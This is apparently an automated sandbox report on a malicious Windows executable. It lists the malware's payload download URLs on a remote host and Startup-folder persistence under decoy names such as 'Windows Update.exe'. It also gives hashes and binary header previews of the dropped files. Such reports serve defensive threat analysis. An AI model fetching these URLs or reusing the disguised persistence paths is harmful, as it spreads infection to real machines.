            http://ddos.dnsnb8.net:799/cj//k2.rarp6RRqyIX.exe, 00000001.00000002.2244767719.000000000063E000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: phishing
            unknown
            http://ddos.dnsnb8.net:799/cj//k3.rarxRRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: phishing
            unknown
            http://ddos.dnsnb8.net:799/cj//k1.rarcRRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: phishing
            unknown
            http://ddos.dnsnb8.net:799/cj//k2.rarMRRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: phishing
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            44.221.84.105
            ddos.dnsnb8.netUnited States
            14618AMAZON-AESUSfalse
            IP
            127.0.0.1
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1481747
            Start date and time:2024-07-25 13:54:57 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 10m 49s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:24
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:1
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:LisectAVT_2403002B_366.exe
            Detection:MAL
            Classification:mal100.spre.phis.troj.adwa.evad.winEXE@31/45@1/2
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 57%
            • Number of executed functions: 200
            • Number of non-executed functions: 66
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Override analysis time to 240000 for current running targets taking high CPU consumption
            • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 20.42.65.92
            • Excluded domains from analysis (whitelisted): client.wns.windows.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • VT rate limit hit for: LisectAVT_2403002B_366.exe
            TimeTypeDescription
            07:56:00API Interceptor1x Sleep call for process: WerFault.exe modified
            07:56:27API Interceptor776739x Sleep call for process: server.exe modified
            13:55:59AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe
            13:56:07AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe
            13:56:28AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            44.221.84.105LisectAVT_2403002B_373.exeGet hashmaliciousBdaejec, Mars Stealer, Stealc, VidarBrowse
            • ddos.dnsnb8.net:799/cj//k3.rar
            LisectAVT_2403002B_385.exeGet hashmaliciousAgentTesla, BdaejecBrowse
            • ddos.dnsnb8.net:799/cj//k2.rar
            LisectAVT_2403002B_390.exeGet hashmaliciousAgentTesla, BdaejecBrowse
            • ddos.dnsnb8.net:799/cj//k2.rar
            LisectAVT_2403002B_399.exeGet hashmaliciousBdaejecBrowse
            • ddos.dnsnb8.net:799/cj//k1.rar
            LisectAVT_2403002B_409.exeGet hashmaliciousBdaejecBrowse
            • ddos.dnsnb8.net:799/cj//k2.rar
            LisectAVT_2403002B_429.exeGet hashmaliciousBdaejecBrowse
            • ddos.dnsnb8.net:799/cj//k2.rar
            LisectAVT_2403002B_420.exeGet hashmaliciousBdaejecBrowse
            • ddos.dnsnb8.net:799/cj//k2.rar
            LisectAVT_2403002B_431.exeGet hashmaliciousBdaejec, BlackMoonBrowse
            • ddos.dnsnb8.net:799/cj//k1.rar
            LisectAVT_2403002B_429.exeGet hashmaliciousBdaejecBrowse
            • ddos.dnsnb8.net:799/cj//k1.rar
            LisectAVT_2403002B_431.exeGet hashmaliciousBdaejec, BlackMoonBrowse
            • ddos.dnsnb8.net:799/cj//k1.rar
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            ddos.dnsnb8.netLisectAVT_2403002B_373.exeGet hashmaliciousBdaejec, Mars Stealer, Stealc, VidarBrowse
            • 44.221.84.105
            LisectAVT_2403002B_385.exeGet hashmaliciousAgentTesla, BdaejecBrowse
            • 44.221.84.105
            LisectAVT_2403002B_390.exeGet hashmaliciousAgentTesla, BdaejecBrowse
            • 44.221.84.105
            LisectAVT_2403002B_399.exeGet hashmaliciousBdaejecBrowse
            • 44.221.84.105
            LisectAVT_2403002B_409.exeGet hashmaliciousBdaejecBrowse
            • 44.221.84.105
            LisectAVT_2403002B_429.exeGet hashmaliciousBdaejecBrowse
            • 44.221.84.105
            LisectAVT_2403002B_420.exeGet hashmaliciousBdaejecBrowse
            • 44.221.84.105
            LisectAVT_2403002B_431.exeGet hashmaliciousBdaejec, BlackMoonBrowse
            • 44.221.84.105
            LisectAVT_2403002B_429.exeGet hashmaliciousBdaejecBrowse
            • 44.221.84.105
            LisectAVT_2403002B_431.exeGet hashmaliciousBdaejec, BlackMoonBrowse
            • 44.221.84.105
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            AMAZON-AESUSLisectAVT_2403002B_373.exeGet hashmaliciousBdaejec, Mars Stealer, Stealc, VidarBrowse
            • 44.221.84.105
            LisectAVT_2403002B_385.exeGet hashmaliciousAgentTesla, BdaejecBrowse
            • 44.221.84.105
            LisectAVT_2403002B_390.exeGet hashmaliciousAgentTesla, BdaejecBrowse
            • 44.221.84.105
            phish_alert_sp2_2.0.0.0(4).emlGet hashmaliciousHTMLPhisherBrowse
            • 52.6.56.188
            phish_alert_sp2_2.0.0.0 (27).emlGet hashmaliciousHTMLPhisherBrowse
            • 52.6.56.188
            LisectAVT_2403002B_399.exeGet hashmaliciousBdaejecBrowse
            • 44.221.84.105
            LisectAVT_2403002B_409.exeGet hashmaliciousBdaejecBrowse
            • 44.221.84.105
            LisectAVT_2403002B_429.exeGet hashmaliciousBdaejecBrowse
            • 44.221.84.105
            LisectAVT_2403002B_420.exeGet hashmaliciousBdaejecBrowse
            • 44.221.84.105
            Ewhite Replay VM .docxGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
            • 44.207.203.25
            No context
            No context
            Process:C:\Users\user\AppData\Local\Temp\server.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):1214464
            Entropy (8bit):7.958532392669138
            Encrypted:false
            SSDEEP:24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
            MD5:16AB569E9D84F0A2C9AACD47D4998D84
            SHA1:DF051511743F94A52BDBC270C4E5BF0D303D6975
            SHA-256:7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
            SHA-512:614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data.........*.....................@.....d.u...`....9..B...F.............. .....fl...:.v.2.*........................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):19456
            Entropy (8bit):6.590978502092559
            Encrypted:false
            SSDEEP:384:1FGSlXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:nbQGPL4vzZq2o9W7GsxBbPr
            MD5:2DBCBB4DB1ACA4CB9699647B07757570
            SHA1:5C142F719D31BEE681D12F16F51BB747B0FC9B1B
            SHA-256:22CA52A1AF4319AAAFC62BEF26154EED07A0C1E72E9AAFC3CAE6E9D352D9AB75
            SHA-512:CED86BC77B8C33FABB2E759EEEA2A97E6E081EF699F084CFE958927CC901A046B11C54C36FA55F69D811258A3D8E2C631EC46EAD68AC2D627AAFAA90D3CB027E
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
            Process:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):2389504
            Entropy (8bit):6.7313459180456565
            Encrypted:false
            SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
            MD5:E10390D2566FCE69600EBD857B003B32
            SHA1:B6C2EC9A2F148D29A49831EF2F0F742D3C679553
            SHA-256:4EFEEAEC2A4468A0516EE2864C960EA58384A658E2FBB43CC6F76286BEC39A2E
            SHA-512:7F1A3FAA72239C40C740B0963C0BF53E8817593E1F5BFBEFD01D77E30315DD8D14E22A8D97A1234783717873CDD30F2B0008C1E9DCC6212559683D2FDB7AB1E3
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\server.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):1214464
            Entropy (8bit):7.958532392669138
            Encrypted:false
            SSDEEP:24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
            MD5:16AB569E9D84F0A2C9AACD47D4998D84
            SHA1:DF051511743F94A52BDBC270C4E5BF0D303D6975
            SHA-256:7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
            SHA-512:614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data.........*.....................@.....d.u...`....9..B...F.............. .....fl...:.v.2.*........................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):31744
            Entropy (8bit):6.366545618307718
            Encrypted:false
            SSDEEP:768:uWQ3655Kv1X/qY1MSdsvQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdsoGCq2iW7z
            MD5:3E98111CACF3A776FA8C7A51514ADE84
            SHA1:E12663961AC403B533BDB645DEEEE637FE2E66C9
            SHA-256:A00E3CDDCB72C1360F854903B2F7434D3DFA16EFF1F9AD48BEFB981FF42FD63A
            SHA-512:B9188BC385CE5D7F61CF960121D0DAD7B429315DC8AFD91026221D96BCEC5577B3C20E70F7DC642BC2E80A3BAD207F5F839D65FFD5723E0C986E2F040A8675F7
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):65536
            Entropy (8bit):0.9889951404772511
            Encrypted:false
            SSDEEP:192:Qq7dbbni0bgK6njE/J9zuiFrZ24IO851:x7xbnpbgnnjQzuiFrY4IO851
            MD5:89925820EDBDCBE7EE9860B728DDA48C
            SHA1:0FAF6F3602CE42BB79D3733FC4CE23141677AD47
            SHA-256:78899D0999976B9580C784B2B607907C7EBE954520E9DC59C8417409E06A6B3A
            SHA-512:FAC967DF4AC4EC955B00332B7C0FB15071C57B868D5B11E092725E70366A1EEBF233D4B915D7E470CEED5E3D2BEC00D4CE37709DFA7EC97C6046F296109CEA57
            Malicious:false
            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.8.2.1.5.6.5.6.3.4.3.5.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.8.2.1.5.7.5.7.9.0.6.4.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.f.2.b.3.3.0.f.-.a.3.e.7.-.4.1.c.9.-.b.f.7.3.-.f.3.0.d.f.8.d.8.d.0.6.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.b.2.2.f.b.c.8.-.4.5.d.9.-.4.7.6.4.-.8.6.e.d.-.c.c.2.c.f.2.7.e.9.0.4.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.R.q.y.I.X...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.1.8.-.0.0.0.1.-.0.0.1.5.-.d.2.4.e.-.2.7.9.8.8.9.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.a.5.c.f.0.e.6.4.a.b.7.4.0.f.9.1.2.8.8.6.0.4.a.9.4.3.4.5.6.9.c.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.R.R.q.y.I.X...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:Mini DuMP crash report, 15 streams, Thu Jul 25 11:55:57 2024, 0x1205a4 type
            Category:dropped
            Size (bytes):167194
            Entropy (8bit):1.8085127995570731
            Encrypted:false
            SSDEEP:768:YqV+x9wpeVg7yzR+nmU5VQLRKO/tOuzVF:Y8PEe+N+nZ5IN/tOuhF
            MD5:AB6F0C335403A6335FBA42C5C6FEACE0
            SHA1:026AE7D40CE9A9891446A15AABF89B2D1725F762
            SHA-256:0DB543CFCEDF68637BD9ABFB3E40D3BCC79C5F4E97A8C793C1564B0A4214732C
            SHA-512:73D31AD11E97684568332C24F106A4EF97D0CF63B68368F60A980487FC4C71EC9F4A34718FA7742A82BDF0C44C192DC63C78631D8EF9820FA9196E6CFD453396
            Malicious:false
            Preview:MDMP..a..... .......M=.f............t.......................<...,!......d....Q..........`.......8...........T............>...N..........h!..........T#..............................................................................eJ.......#......GenuineIntel............T...........F=.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):6268
            Entropy (8bit):3.724953000150766
            Encrypted:false
            SSDEEP:96:RSIU6o7wVetbyhg6GZYW2d459aE5aMQUB89bUlsfVjcm:R6l7wVeJcg6oYWXDbpDB89bUlsfVjcm
            MD5:D3F2D1B2AE41FD2DEC99F7284E576CE0
            SHA1:9293C67CD1772831E5E81FD0B38ABABEA4FB35C2
            SHA-256:788F61B0CBFDC159A4264288204FA29E89710B1AAD1D59D6F75D9A7DE3467E74
            SHA-512:611A58099A4CD27319F41FB901F551F57644CA86F3DF51FF473D389B82A5C66C6D5558E0B2E704534BB3FDCE1C9521FF10439EA283C7894B0BE613B6DB2740D0
            Malicious:false
            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.8.8.8.<./.P.i.
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):4551
            Entropy (8bit):4.46050339256656
            Encrypted:false
            SSDEEP:48:cvIwWl8zszJg77aI963VWpW8VYyYm8M4J0gFXp+q8eFTiYhgkTd:uIjfNI7Y3k7V2JXptTjhgkTd
            MD5:3AB9F5902AB34582E9591C4ABCABDCCD
            SHA1:830AC77062CD0B7CD73531FC8F8868022FDA25FA
            SHA-256:DECD3AB44DC7A6C9317663E751886EA1C17BAA1B281D637E47C5D8ED58832199
            SHA-512:03FD8660A3CB6C0BD52AF878A76898F059AA8CF9CF1240A0D0EB2A88258152D6F160CB39ECC919391D18CD25920F4A03018F7060B5433E102C18DAEE54A6A402
            Malicious:false
            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="426418" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
            Process:C:\Users\user\AppData\Local\Temp\server.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):1214464
            Entropy (8bit):7.958532392669138
            Encrypted:false
            SSDEEP:24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
            MD5:16AB569E9D84F0A2C9AACD47D4998D84
            SHA1:DF051511743F94A52BDBC270C4E5BF0D303D6975
            SHA-256:7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
            SHA-512:614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
            Malicious:true
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data.........*.....................@.....d.u...`....9..B...F.............. .....fl...:.v.2.*........................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):525
            Entropy (8bit):5.259753436570609
            Encrypted:false
            SSDEEP:12:Q3LaJU2C9XAn10Ug+9pfu9t0U29xtUz1B0U2uk71K6xhk7v:MLF2CpI3zffup29Iz52Ve
            MD5:260E01CC001F9C4643CA7A62F395D747
            SHA1:492AD0ACE3A9C8736909866EEA168962D418BE5A
            SHA-256:4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
            SHA-512:01AF7D75257E3DBD460E328F5C057D0367B83D3D9397E89CA3AE54AB9B2842D62352D8CCB4BE98ACE0C5667846759D32C199DE39ECCD0CF9CD6A83267D27E7C4
            Malicious:false
            Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\bec14584c93014efbc76285c35d1e891\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\7d443c6c007fe8696f9aa6ff1da53ef7\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\2cdaeaf53e3d49038cf7cb0ce9d805d3\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d0e5535854cce87ea7f2d69d0594b7a8\System.Windows.Forms.ni.dll",0..
            Process:C:\Users\user\Desktop\LisectAVT_2403002B_366.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):525
            Entropy (8bit):5.259753436570609
            Encrypted:false
            SSDEEP:12:Q3LaJU2C9XAn10Ug+9pfu9t0U29xtUz1B0U2uk71K6xhk7v:MLF2CpI3zffup29Iz52Ve
            MD5:260E01CC001F9C4643CA7A62F395D747
            SHA1:492AD0ACE3A9C8736909866EEA168962D418BE5A
            SHA-256:4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
            SHA-512:01AF7D75257E3DBD460E328F5C057D0367B83D3D9397E89CA3AE54AB9B2842D62352D8CCB4BE98ACE0C5667846759D32C199DE39ECCD0CF9CD6A83267D27E7C4
            Malicious:true
            Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\bec14584c93014efbc76285c35d1e891\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\7d443c6c007fe8696f9aa6ff1da53ef7\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\2cdaeaf53e3d49038cf7cb0ce9d805d3\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d0e5535854cce87ea7f2d69d0594b7a8\System.Windows.Forms.ni.dll",0..
            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):525
            Entropy (8bit):5.259753436570609
            Encrypted:false
            SSDEEP:12:Q3LaJU2C9XAn10Ug+9pfu9t0U29xtUz1B0U2uk71K6xhk7v:MLF2CpI3zffup29Iz52Ve
            MD5:260E01CC001F9C4643CA7A62F395D747
            SHA1:492AD0ACE3A9C8736909866EEA168962D418BE5A
            SHA-256:4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
            SHA-512:01AF7D75257E3DBD460E328F5C057D0367B83D3D9397E89CA3AE54AB9B2842D62352D8CCB4BE98ACE0C5667846759D32C199DE39ECCD0CF9CD6A83267D27E7C4
            Malicious:false
            Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\bec14584c93014efbc76285c35d1e891\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\7d443c6c007fe8696f9aa6ff1da53ef7\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\2cdaeaf53e3d49038cf7cb0ce9d805d3\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d0e5535854cce87ea7f2d69d0594b7a8\System.Windows.Forms.ni.dll",0..
            Process:C:\Users\user\AppData\Local\Temp\server.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):1214464
            Entropy (8bit):7.958532392669138
            Encrypted:false
            SSDEEP:24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
            MD5:16AB569E9D84F0A2C9AACD47D4998D84
            SHA1:DF051511743F94A52BDBC270C4E5BF0D303D6975
            SHA-256:7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
            SHA-512:614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
            Malicious:true
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data.........*.....................@.....d.u...`....9..B...F.............. .....fl...:.v.2.*........................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\server.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):1214464
            Entropy (8bit):7.958532392669138
            Encrypted:false
            SSDEEP:24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
